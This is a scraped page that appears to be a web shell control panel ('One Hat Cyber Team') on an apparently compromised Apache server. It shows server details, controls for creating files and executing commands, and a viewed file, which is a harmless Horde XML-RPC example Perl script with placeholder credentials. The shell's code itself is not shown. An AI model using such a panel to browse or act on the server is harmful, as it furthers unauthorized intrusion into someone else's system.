⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-pear
/
pear
/
docs
/
Horde_Rpc
/
examples
/
View File Name :
xmlrpc.pl
#!/usr/bin/perl -w die("Please configure the URL, username, and password, and then remove this line.\n"); use XMLRPC::Lite; use Data::Dumper; my $proxy = 'http://username:password@example.com/horde/rpc.php'; my $xlite = XMLRPC::Lite -> proxy($proxy) -> call('calendar.listCalendars'); my $status = $xlite->result; print Data::Dumper->Dump($status);